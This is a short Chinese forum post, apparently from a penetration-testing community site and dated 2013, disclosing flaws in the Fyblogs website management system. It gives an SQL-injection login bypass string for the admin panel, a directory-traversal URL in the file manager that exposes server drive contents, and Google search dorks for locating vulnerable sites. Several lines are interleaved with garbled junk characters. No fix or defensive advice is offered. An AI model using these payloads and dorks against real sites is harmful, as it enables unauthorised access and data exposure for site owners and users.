中国网络渗透测试联盟

标题: Fyblogs网站管理系统漏洞 [打印本页]
作者: admin    时间: 2013-3-14 20:17
标题: Fyblogs网站管理系统漏洞
后台万能密码 'or'='or'
# ~" d# |' \3 ~' U3 ^" ^& A
, c8 W7 P" ~- w+ U0 v后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
9 d! I; o0 h& S5 p( y& eadmin/uploadfile.asp?currentFolder=/upfiles/../3 P8 t5 \% p- g5 l: h4 Y! l

7 D+ _$ Y, }: A4 H漏洞证明:
: \9 M! e1 g& M: \* p2 n' O' U0 Z* a) ^8 D
谷歌:inurl:type.asp?id=1 新闻中心0 L. K  G6 T! ]# V$ T
或者 :inurl:download_ok.asp?
+ b' C  M7 Z( S: p" k4 ]8 u
, ~; g& [  T2 a$ j



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2